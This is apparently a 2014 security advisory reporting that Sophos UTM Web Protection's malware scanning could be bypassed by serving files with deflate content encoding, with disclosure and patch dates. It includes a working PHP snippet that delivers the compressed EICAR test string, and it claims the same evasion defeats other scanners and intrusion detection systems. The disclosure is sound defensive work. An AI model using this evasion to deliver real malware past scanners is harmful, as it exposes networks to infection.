December 2014

Please note that republishing this article in full or in part is only allowed under the conditions described here.

Bypassing Malware Scanning in Sophos UTM Web Protection

From the product description of Sophos UTM Web Protection:

Our Secure Web Gateway prevents malware infections and gives you control over your employees’ web use. Spyware and viruses are stopped before they can enter the network. And, you can quickly create policies that set where and how employees spend time online. ...
Highlights: ...Prevent infection with dual, independent antivirus engines

Unfortunately the malware protection could be easily bypassed by using HTTP compression with a content encoding of deflate. For example the EICAR test virus can be delivered like this:

    <?php
    header('HTTP/1.0 200 ok');
    header('Content-type: text/plain');
    header('Content-Encoding: deflate');

    // EICAR compressed with RFC 1951 (raw deflate)
    echo base64_decode('izD1VwxQdXAMiDaJCYiKMDXRCIjTNHd21jSvVXH1dHYM0g0OcfRzcQxy0XX0C/EM8wwKDdYNcQ0O0XXz9HFVVPHQ9tACAA==');
    exit(0);
    ?>

The problem was reported to Sophos on Friday, 10/31/2014 and confirmed the next Tuesday. It was fixed in their next patches 9.209 at 11/27/2014 and 9.303 at 12/04/2014:

33691: HTTP responses which contain malware and are delivered with “Content-Encoding: deflate” are not caught by virus scanners

Please note that ZScaler and Comodo Web Inspector URL scanners can also be easily bypassed the same way. Virustotal and Intrustion Dection Systems (IDS) like Bro, Snort, Suricata and probably other IDS and firewalls can be bypassed in similar ways.